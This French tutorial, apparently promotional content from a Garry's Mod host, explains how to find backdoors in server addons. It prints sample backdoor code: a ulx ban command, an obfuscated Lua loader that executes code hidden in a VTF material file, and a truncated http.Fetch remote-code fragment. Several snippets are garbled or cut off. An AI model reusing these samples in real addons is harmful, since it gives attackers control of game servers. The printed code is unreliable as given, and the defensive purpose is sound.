December 17, 2021

Comment trouver les éventuelles backdoors sur ton serveur GMOD

Comment trouver les éventuelles backdoors sur ton serveur GMOD

Bonjour toi ! Aujourd'hui, je vais t'apprendre à reconnaître une backdoor dans tes addons ! Attention : le leak est formellement dangereux, nous ne sommes pas responsables des soucis occasionnés sur votre serveur à leur utilisation, le leak peut être aussi un addon que votre ami vous donne !

Pré-réquis : - Avoir son serveur sur un DarkRP ou un dérivé. - Avoir un logiciel d'édition ( Visual Studio Code / Notepad ++ ). - Un serveur chez GarryHost car c'est vraiment puissant <3.

Explication d'une backdoor :

Une backdoor est une ligne de code malicieuse permettant d’exécuter une fonction, et le plus souvent, c'est méchant du type de pouvoir mettre tous les joueurs superadmin.

Empêcher les administrateurs de bannir ou même mettre ta map sur gmconstruct ( d'ailleurs best map de Garry's Mod RP ) ***__Comment reconnaître une backdoor dans un addon***

Un addon est constitué de client, shared et server, je ne te l'apprends pas, les backdoors sont seulement dans les fichiers serveur ( donc le plus souvent dans ton addon/server/sv_lesfichiers.lua ) . Il y a trois types de backdoors : - Les commandes : Le plus souvent, c'est des commandes bizarre avec ulx comme :

RunConsoleCommand("ulx", "banid", ply:SteamID:01:483487684() )

- Les backdoors en materials :

C'est la backdoor la plus complexe, elle va exécuter un matériau étant présent qui lui va exécuter une commande

.[15:21]local function a(b, c) c = c % 177 return (b - c) % 177 end local function d(e, f) local g = tonumber(util.CRC(f)) local h = string.len(e) local i = string.len(f) local j = 1 local k = 1 local l = {} while j <= h do j = j + string.byte(f[k % (i - 1) + 1]) l[k] = a(string.byte(e[j]), g) k = k + 1 j = j + 1 end return string.char(unpack(l)) end local function VTF(m, n, o) local p = file.Open(m, "rb", "BASE_PATH") if not p then return end p:Skip(o) local q = p:Read(p:Size() - o) local vc = _G["Com" .. "pi" .. "leStr" .. "ing"] p:Close() local l = d(q, n) return vc(l, m, false) end local r = VTF("garrysmod/addons/laddondeslownlsleplusbeau/materials/models/cartrunk.vtf", [[epC$5~rNM~k[<="cNF/lM,Iz$Fh1,)]s+\?~'Cla.n{/z`8/VLuE,gWwxnPk-y-x[?D2.V9zFTPsD,TXPt9KD75.}U$!MW,enaWg9ez&@(a{B[[;v5JxxfGO$DJw92&c]], 0)

- Les backdoors à l'ancienne, en ligne avec une redirection en http :

http.Fetch( FUrl, function( body, len, header, code) -- Les backdoors obfusqués :
str = str:gsub( "\226\128\168", "\\\226\128\168" )

Il te suffit juste de supprimer ces backdoors et le tour est joué ! Comment les détecter ? Avec un serveur GarryHost, tu peux installer un détecteur de backdoor te permettant de directement les localiser ( nomalua ).

Après le reboot de ton serveur, effectuer la commande dans ta console "nomalua scan" et les backdoors se scanneront ! Si tu veux en apprendre plus, consulte les tutoriels disponibles(hyperlien) !

- GarryHost, la qualité à prix transparant !

Un maximum de puissance pour ton serveur garry's mod

Créer un serveur gmod